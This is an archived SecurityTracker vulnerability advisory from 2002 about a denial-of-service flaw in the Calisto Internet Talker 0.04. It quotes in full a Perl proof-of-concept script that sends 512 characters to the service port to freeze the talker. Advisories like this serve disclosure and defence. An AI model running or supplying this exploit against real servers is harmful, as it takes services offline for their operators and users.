SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Generic)  >  Calisto Vendors:  Howkins, Peter et al
Calisto Internet Talker Bug Lets Remote Users Crash the Service
SecurityTracker Alert ID:  1005700
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Nov 25 2002
Impact:  Denial of service via network
Exploit Included:  Yes  
Version(s): 0.04
Description:  A denial of service vulnerability was reported in the Calisto Internet talker. A remote user can cause the service to freeze.

SecurityFreaks reported that a remote user can connect to the talker service port and send 512 characters to the service to cause it to freeze. A manual restart is reportedly required.

Some demonstration exploit code is provided in the Source Message and at Packetstorm at:

http://packetstorm.decepticons.org/0211-exploits/SF-talkischeap.pl
Impact:  A remote user can cause the service to lock up.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.arcsite.de/hp/flibble/calisto/ (Links to External Site)
Cause:  Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.

 Source Message Contents
Date:  Mon, 25 Nov 2002 00:46:51 -0500
Subject:  Calisto Internet Talker Version 0.04 Remote Denial of Service

 

http://packetstorm.decepticons.org/0211-exploits/SF-talkischeap.pl


#!/usr/bin/perl
 
# S e c u r i t y F r e a k s
#  www.securityfreaks.com
 
# Calisto Internet Talker Version 0.04 Remote Denial of Service
 
 
# This exploit will not cause Calisto to crash but rather cause it 
# to freeze until manually restarted. This actually works out better 
# because Calisto comes with an autorun script that would restart it 
# should it crash anyway.
 
# [ subversive[at]linuxmail.org ] - *31/10/2002*


use IO::Socket;


$data = "A";
$size = "512";
$freeze .= $data x $size;

while($_ = $ARGV[0], /^-/) {
    shift;       
    last if /^--$/;
    /^-h/ && do { $host = shift; };
    /^-p/ && do { $port = shift; };
 

if(!$host != 0) {

print <<"ACTIONSSPEAKLOUDERTHANWORDS";
   
   SF-talkischeap.pl by subversive - www.securityfreaks.com
   Calisto Internet Talker Version 0.04 Remote Denial of Service
  

   Usage :  $0 -h <host> -p <port>

ACTIONSSPEAKLOUDERTHANWORDS
exit;

 

my $sock = new IO::Socket::INET ( Proto    => "tcp",
                                  PeerAddr => $host,
                                  PeerPort => $port,
                                );
die "\nCould not connect to $host : $!\n" unless $sock;

print $sock "$freeze";
close($sock);
exit;


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2002, SecurityGlobal.net LLC